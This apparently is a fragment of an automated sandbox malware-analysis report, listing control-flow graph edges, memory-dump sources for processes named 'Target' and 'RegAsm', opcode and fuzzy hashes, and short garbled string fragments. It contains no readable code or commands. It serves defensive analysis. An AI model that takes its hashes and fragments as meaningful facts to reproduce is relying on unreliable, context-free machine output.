7ffd9b981b7b-7ffd9b981b81 592->617 593->592 608 7ffd9b981bbc-7ffd9b981bc7 594->608 609 7ffd9b981b97-7ffd9b981bb5 594->609 600 7ffd9b981c22-7ffd9b981c25 595->600 601 7ffd9b981be1-7ffd9b981be4 595->601 619 7ffd9b981973-7ffd9b98198a 597->619 620 7ffd9b98198c-7ffd9b981990 597->620 599->515 615 7ffd9b981c4c-7ffd9b981c4d 600->615 616 7ffd9b981c27-7ffd9b981c45 600->616 613 7ffd9b981c0b-7ffd9b981c20 601->613 614 7ffd9b981be6-7ffd9b981c04 601->614 605->587 646 7ffd9b981958 605->646 608->515 629 7ffd9b981bcd-7ffd9b981bda 608->629 609->608 610->515 613->515 614->613 615->515 616->615 631 7ffd9b981b88 617->631 619->597 635 7ffd9b981997-7ffd9b98199a 620->635 629->515 631->515 639 7ffd9b98189d 632->639 640 7ffd9b98189b 632->640 643 7ffd9b98199e 635->643 644 7ffd9b98199c 635->644 641 7ffd9b98189f-7ffd9b9818a5 639->641 640->641 641->515 647 7ffd9b9818ab-7ffd9b9818b6 641->647 649 7ffd9b9819a0-7ffd9b9819a6 643->649 644->649 646->635 647->515 649->515 650 7ffd9b9819ac-7ffd9b9819b7 649->650 650->515
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1747862162.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b980000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16c452d6eb08ec45029555d9bc2a534572c19ab92ffb29a0126ad4ad81e3a7ad
                                              • Instruction ID: d43081301228bceeec4fdea852a56270cee3b443fc952bff19120da44af46b6f
                                              • Opcode Fuzzy Hash: 16c452d6eb08ec45029555d9bc2a534572c19ab92ffb29a0126ad4ad81e3a7ad
                                              • Instruction Fuzzy Hash: 09029821B2ED1F1BFAB5A7AC54712B913C2EFDC255B56027BD40DC32F6DD2DAA024241

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ebcd4ae327f416c7476ff447f67b7911d6e185d362cdd93cb67cc6ce09deba3c
                                              • Instruction ID: 3a308749cdd96d394bac5f68bbfb321d44c52c19312967aa00e17ae44d9cc403
                                              • Opcode Fuzzy Hash: ebcd4ae327f416c7476ff447f67b7911d6e185d362cdd93cb67cc6ce09deba3c
                                              • Instruction Fuzzy Hash: 1FE11671B0990D4FEB99EF68C460AB577E1FFA9340B1101BAD01ECB2A6DE24ED428751

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 717 7ffd9b8a054f-7ffd9b8a05b6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 021b1dc19244e60dfb5644c35dc925df191df77975a02dd203b5fc72608545be
                                              • Instruction ID: b702133c827d28a4b0c104c5651c0c1c8a55fa50fd1f893f9e277941d997fdcb
                                              • Opcode Fuzzy Hash: 021b1dc19244e60dfb5644c35dc925df191df77975a02dd203b5fc72608545be
                                              • Instruction Fuzzy Hash: EDC10671B0990D4FD799EF6CD460AA477E1FF99310B1501BAD05DCB2E3DE24AC4287A1

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe03b60a8d1978a51b320b994910a476478d66f7e965719857a88160ba8dd517
                                              • Instruction ID: 29f86c3508452628681c171ccded8c565b4b2c204e1bd49135aaa42cf5a79fde
                                              • Opcode Fuzzy Hash: fe03b60a8d1978a51b320b994910a476478d66f7e965719857a88160ba8dd517
                                              • Instruction Fuzzy Hash: 6BB13731B1890D4FEB98EB5CD464AB977E1FF99310F1502BAD05DC72A2DE24AC42C791
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: baa991c26faa0163e815814d52ae7aa336407ced31c277f08ade831f323fe969
                                              • Instruction ID: 2b51ef077b6f7ffca23fd1d277666c9c4e82df7692fc60808d66f8ce613105b7
                                              • Opcode Fuzzy Hash: baa991c26faa0163e815814d52ae7aa336407ced31c277f08ade831f323fe969
                                              • Instruction Fuzzy Hash: E7B10771B0994D4FDB99DF6CC460BA577E1FFA9300B1601B9D01DCB2E2DA24ED428BA1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 099f93bafa6892037963aad19e8dbfdce06f23965c5d6007275acdc1b19bf8ff
                                              • Instruction ID: ee679fc7c31fcf35f4483a2cc44c96e0c1b3edb19b3dc4feb1fe96342955f688
                                              • Opcode Fuzzy Hash: 099f93bafa6892037963aad19e8dbfdce06f23965c5d6007275acdc1b19bf8ff
                                              • Instruction Fuzzy Hash: DDA1E571B0990D4FDB99EF6CC460A7477E1FFA9300F1601B9D01DCB2A6DA24ED428B91
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: acbce731e400322d1873fc0f2ebeb40b390e00e1781761d8b354bf21fe6a95d7
                                              • Instruction ID: 5d0688c91eca370e579efdb3d1f30f81961b538653aedcb8ff2410c9ebd28760
                                              • Opcode Fuzzy Hash: acbce731e400322d1873fc0f2ebeb40b390e00e1781761d8b354bf21fe6a95d7
                                              • Instruction Fuzzy Hash: 2B513972B0D50D4FFB74AB68C8696F933D4EF5A710F0101BAD40DC72A2ED25AE828790
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7363c3ee96798414b8d816eac748e8395bbac2f5c8407bb1edb1a41cd6b4a4f
                                              • Instruction ID: d9744af20af9e10b49412007296c272400796f52d45e9483c900f823e917eefe
                                              • Opcode Fuzzy Hash: e7363c3ee96798414b8d816eac748e8395bbac2f5c8407bb1edb1a41cd6b4a4f
                                              • Instruction Fuzzy Hash: 8541BE74B1981D9FDB98EB5CC464AA877E2FF5D340B5500B5D00EEB2A5DA24ED41CB20
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1747862162.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b980000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d63b9651d18930d7e76ae4e57a71fefb762d30432f5588adf11ef79dd3ba9c6c
                                              • Instruction ID: 098ea0f4d257966ccd5772517db9dec00d23b3e0f84d4d61b9b0729e43e967e7
                                              • Opcode Fuzzy Hash: d63b9651d18930d7e76ae4e57a71fefb762d30432f5588adf11ef79dd3ba9c6c
                                              • Instruction Fuzzy Hash: 0F318111B2AE5E0FE7A9A36C047527952C3EFDC645B5A42BAD44EC32F6ED38ED024340
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1747862162.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b980000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6af814846adaff04c87289b4f249e8319f1d9aa48cf6750090132c7313f0501d
                                              • Instruction ID: 3db99956821a13a94aef6b3ec92541bba0c26cbba3751a60c49393035f81da47
                                              • Opcode Fuzzy Hash: 6af814846adaff04c87289b4f249e8319f1d9aa48cf6750090132c7313f0501d
                                              • Instruction Fuzzy Hash: A631B811B2AE5E1BE7E9A76C047123552C3EFDC655B5A427AD40EC32F6ED38DD024341
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1747862162.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b980000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e220f61ff76c77247e757887a5bfa2fe6d311302cab3a2f013504021c96b3f64
                                              • Instruction ID: 9a268bf44d03135dd464bef1f07f0eb36004c6703f42f6cd8fa2e479a7b10c4f
                                              • Opcode Fuzzy Hash: e220f61ff76c77247e757887a5bfa2fe6d311302cab3a2f013504021c96b3f64
                                              • Instruction Fuzzy Hash: 0C318621B2AE5E1BE7E9A76C047127912C3DFDC655B5A427AD00EC32F6ED38ED024200
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b75cb80af04a0ea9bd3df166889b539fb32dbf7139ba9575fe75949af2b6a465
                                              • Instruction ID: fae594f13c6b9df991965c95febb7fe302b9d1f1d8266a833da714d6b044a668
                                              • Opcode Fuzzy Hash: b75cb80af04a0ea9bd3df166889b539fb32dbf7139ba9575fe75949af2b6a465
                                              • Instruction Fuzzy Hash: 652148B6F0E28D9FE752DBA8C4552EC7BE0EF49310F1141B5C044C7291EA34A686C7A0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84fe24c6159e2dd6e5a32a98a5f0df9fc1ac257b2876e94302388b8d772b41cc
                                              • Instruction ID: aaf03cd1e173d919c134942a045663e467f9ee164bcc14da5a870cf5edbc8097
                                              • Opcode Fuzzy Hash: 84fe24c6159e2dd6e5a32a98a5f0df9fc1ac257b2876e94302388b8d772b41cc
                                              • Instruction Fuzzy Hash: AD118255F0A90D5FFBA5EBA880242B822C1DF9D340F5610B6C40DD72E6DC1C6E8247A1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0dcf5a12e6b35674636865b21acc8a32caeb96461c94afa2b8d82af22db3894
                                              • Instruction ID: e49a845179467b425bb875b764d264ba197dee7644151597a9ac821a7a3ffcc2
                                              • Opcode Fuzzy Hash: c0dcf5a12e6b35674636865b21acc8a32caeb96461c94afa2b8d82af22db3894
                                              • Instruction Fuzzy Hash: 9F1104B1B0E24D9FEB12DBB8C8845DC7BE0EF45314F1082B6C480C7291EA3466878790
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab79a3c1d2024fb37ebb7f8cd1e1a4a8ad8d91d5a7bcf7e32275ff90024cdc0f
                                              • Instruction ID: 8326b3c4345666771c3cc27171d3ec428b94e38f4d0a20f8f0176c0c92183670
                                              • Opcode Fuzzy Hash: ab79a3c1d2024fb37ebb7f8cd1e1a4a8ad8d91d5a7bcf7e32275ff90024cdc0f
                                              • Instruction Fuzzy Hash: 9EF0C812B0D5664BC70AF76CFCB65E537A0DF5616630841B7D048C61E7E806944B83D2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e64d8e812a650777160f8815b2a6bd2a92650be815c446d06b5f18cb96f7d90
                                              • Instruction ID: f016c887a867c3fb5e2b0261a1bda7defb6b49f9523fe2d5350a5bbd1b522a96
                                              • Opcode Fuzzy Hash: 8e64d8e812a650777160f8815b2a6bd2a92650be815c446d06b5f18cb96f7d90
                                              • Instruction Fuzzy Hash: 9E01D6A5F0AA0D4FE7A5DB28807037423C2EF9E740F4A40B6C80DD73E6DC295E4287A1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac0baa72795a363e6a6687ad9fd3d98b5b0b59d2ad7a67fff20a2ca55445d560
                                              • Instruction ID: f51f8c25fa56df3f6b82403d67451bae4ce544f75af4ba5b2d07a7d4638fca2e
                                              • Opcode Fuzzy Hash: ac0baa72795a363e6a6687ad9fd3d98b5b0b59d2ad7a67fff20a2ca55445d560
                                              • Instruction Fuzzy Hash: 7D015E6190EBC94FD7238BB48829595BF70EF07300F0A45EBD085CB0E3E6285919C762
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4983472faa519be4dd5f7660cc51698e3a19e6ed2c9c8dbd2819d11b4d1953a4
                                              • Instruction ID: 36641b1b2475c166f29bd05314515cdf188b687940067c05e0a0c46021885fe0
                                              • Opcode Fuzzy Hash: 4983472faa519be4dd5f7660cc51698e3a19e6ed2c9c8dbd2819d11b4d1953a4
                                              • Instruction Fuzzy Hash: D6F02E21709A5947C719A73DD86D4F477D0EF9B51634841FBC045CB297DC15DC86C781
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 02bb0644c6170661a7db00d4069acfc3a2d88a2333bd6ee4b85645c6e8247743
                                              • Instruction ID: 90042b6e685b503440cc6185f980e4316d8bcb4386b779db063c8011ff329c68
                                              • Opcode Fuzzy Hash: 02bb0644c6170661a7db00d4069acfc3a2d88a2333bd6ee4b85645c6e8247743
                                              • Instruction Fuzzy Hash: DEF0E2B1B0B95D4FE7929B28802466937D0EF5E240B0601B7C80CCB3E7DD195E4347E1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1db9156359f7e4757dd807e7fe12589d05749aa4afe65bd8f151094b9e3babc9
                                              • Instruction ID: b3fc10cec31a4d2196e51bdb6ca19fdf2285a2acc879a620950981a00abba9ca
                                              • Opcode Fuzzy Hash: 1db9156359f7e4757dd807e7fe12589d05749aa4afe65bd8f151094b9e3babc9
                                              • Instruction Fuzzy Hash: 94F08220B09D0D4FE789FB688465A7536D1EB9E244B920065E40EC7396ED289D818711
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6030f9875f0b096d28ac36545516cc490681892c22d0b1454f4d7c34eeca34a
                                              • Instruction ID: bd18363601697746a6f8d815f08b2c93a01cf43c857747e9ca689d1a0f368093
                                              • Opcode Fuzzy Hash: d6030f9875f0b096d28ac36545516cc490681892c22d0b1454f4d7c34eeca34a
                                              • Instruction Fuzzy Hash: 43F0AE2684F3C84FC7239B7098666947F30AF47214B4F42DBD598CA0A3D65D9A1DC362
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7050909f3b5cbcbcb55140a4714c6e6b56ab5f6062a9e8f87f036d4c225f15ad
                                              • Instruction ID: 34bb53cc06109587250f48e497d52fbfec7baa2a63437c89403f01d917756833
                                              • Opcode Fuzzy Hash: 7050909f3b5cbcbcb55140a4714c6e6b56ab5f6062a9e8f87f036d4c225f15ad
                                              • Instruction Fuzzy Hash: 77D0673071CB498BE658EA9DD96156EB3D2EB98B00F101539A08A932A6DD24FD418B42
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79e27945db6538d9c8cd776b352795047267ea90bf4e567d18f352d01f2ff1a8
                                              • Instruction ID: 8b7a9c3118adee1dd55bb0b9383b7ca263c73cda20740713062b440e369ac29b
                                              • Opcode Fuzzy Hash: 79e27945db6538d9c8cd776b352795047267ea90bf4e567d18f352d01f2ff1a8
                                              • Instruction Fuzzy Hash: 04E05B34B0A20EDBE710EB94C4946EC7771EF56321F118275C005972A8DE7867C4CB40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: >M_^$M_^z$M_^|$M_^|
                                              • API String ID: 0-3895440685
                                              • Opcode ID: 5118105a19b2c361c48f8602d4b2302dba27709cdaebcc91dcca38ecb497c569
                                              • Instruction ID: 8a351c9177052ca2908aba038da5925cfbe63758ace180b454071c94ec32df7f
                                              • Opcode Fuzzy Hash: 5118105a19b2c361c48f8602d4b2302dba27709cdaebcc91dcca38ecb497c569
                                              • Instruction Fuzzy Hash: CA31A55BB1A93E42D22A32ADBD6A8FD6700CFC1B7EB0447B3D26CC90D76C48204655E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7S$ 8S$(7S$(8S$07S$08S$88S$@8S$H8S$P8S$X8S$`7S$h7S$p7S$x7S$7S$7S$N_H$cZ
                                              • API String ID: 0-405572988
                                              • Opcode ID: 0068d8197a436d2003f08cbb120e144e6f9bb455ea11c1ece8f08cdc86385d92
                                              • Instruction ID: 00818a0702f7f74d57bfc71a2af2b57f50e6df3e62be763387b5a8132b54149e
                                              • Opcode Fuzzy Hash: 0068d8197a436d2003f08cbb120e144e6f9bb455ea11c1ece8f08cdc86385d92
                                              • Instruction Fuzzy Hash: 1AE2A370A19A4D8FDBA8DF58C490BA977E1FF99300F1542AAD44DD72A6CB31ED81CB40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 89S$X9S$`9S$h9S$p9S$x9S
                                              • API String ID: 0-3395677054
                                              • Opcode ID: 1d294912dd2dae1df9ac0ec0d317ea882f4337e21dbd303efd4a2fa0d1389364
                                              • Instruction ID: 70bc8e1fad50a0ee87f832eb04741d8daefbf90c00dc31a931c437917840b2e0
                                              • Opcode Fuzzy Hash: 1d294912dd2dae1df9ac0ec0d317ea882f4337e21dbd303efd4a2fa0d1389364
                                              • Instruction Fuzzy Hash: 04523D30B09A498FDBA8EB2CC455B6977E1FF99300F1546BEE04DC72A6DE35E8418B41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9I_L
                                              • API String ID: 0-2439352920
                                              • Opcode ID: 01f2fb7ba1d5747f582d9a62e3c63b72154efbecb4c4d46a182244cc8ce912ff
                                              • Instruction ID: 1d3c5f787a99a05a7d721299c312a58638953a2c358eeed470a10a027f8bb019
                                              • Opcode Fuzzy Hash: 01f2fb7ba1d5747f582d9a62e3c63b72154efbecb4c4d46a182244cc8ce912ff
                                              • Instruction Fuzzy Hash: E0729031B18A4A4FEB98EF1C84A577973D2FB98700F5502BEE45EC72D6DE24AC428741
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a03d4a22593432398ced39f4682b8d9ace6ad2dd949597c21c4555ed636c8521
                                              • Instruction ID: 19d6d83c476911757d276321c13b871b5e2742c740af3c05ed423522bc95568b
                                              • Opcode Fuzzy Hash: a03d4a22593432398ced39f4682b8d9ace6ad2dd949597c21c4555ed636c8521
                                              • Instruction Fuzzy Hash: 9FF2E331B0D94D8FDBA8EFACC465AB877E1FF59300B1541BAE04DC72A6DE25A842C750
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `8S
                                              • API String ID: 0-3413140806
                                              • Opcode ID: 0ab7878d8f88f2427d62618b0c4c659a00ccaad8725486fe615dd750715a0e2f
                                              • Instruction ID: fb7256a873bb3989946281de6c83ad3a4f7c538663692241537caf9653cad663
                                              • Opcode Fuzzy Hash: 0ab7878d8f88f2427d62618b0c4c659a00ccaad8725486fe615dd750715a0e2f
                                              • Instruction Fuzzy Hash: 8052D030B1DB4E8FE768EB68C46556577E1FF98300F1506BEE49AC32A6DE34E8428741
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4142886204.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b970000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 604006bfda1bb7da6d4a95c256c66130741a828d3d441e3277af3c304b4a9ea9
                                              • Instruction ID: b0b7d95c8b9bcf1d6f29e6b2bdc034ef24e5a8c5bf8cedc69a20eb8c18eb7576
                                              • Opcode Fuzzy Hash: 604006bfda1bb7da6d4a95c256c66130741a828d3d441e3277af3c304b4a9ea9
                                              • Instruction Fuzzy Hash: 5A42C122B2EE5E1FE7F996AC04B523513D3EFD8654B5A41BAC44DC32F6ED18ED064201
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4142886204.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b970000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d2c14eddb4a7ece483fe6d0382d1dc548471622ed06ed1f7f35f9778a044831
                                              • Instruction ID: bed36a2f14fa3c11821df8a00803b12ebc6bc0a406d80069abe14e18ad2ffcad
                                              • Opcode Fuzzy Hash: 9d2c14eddb4a7ece483fe6d0382d1dc548471622ed06ed1f7f35f9778a044831
                                              • Instruction Fuzzy Hash: F632C611B2FA8E1BE7B6A7A804B527927D2EFD9200F5A42BAD04DC71F3DD1C9A074341
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0835cf07f9cfd797baf540b8f652e11659637e2e4ca773681d62736810860d82
                                              • Instruction ID: 2acf25126f7bf0f49161bbd2870e6a3e7274ba64aa9693019baefdebbbfdb000
                                              • Opcode Fuzzy Hash: 0835cf07f9cfd797baf540b8f652e11659637e2e4ca773681d62736810860d82
                                              • Instruction Fuzzy Hash: 33025D70B19A1D8FEBA8DB58C49477973E1FF98305F1142BAD40ED72A1DA35A982CB40
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54600ed0351ba288edadf6db750b107795c7c1341da48d6dfdc7776f5b019814
                                              • Instruction ID: 8a0b3e31cd84d018f40c092251d3cf3cd8ea6e8a634b57d03411cd929523feb2
                                              • Opcode Fuzzy Hash: 54600ed0351ba288edadf6db750b107795c7c1341da48d6dfdc7776f5b019814
                                              • Instruction Fuzzy Hash: DCE1E430B19A4E8FEBA8DF68C8657E93BE1FF58310F04426AD84DC7295CE7499418BC1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4142886204.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                              Joe Sandbox IDA Plugin
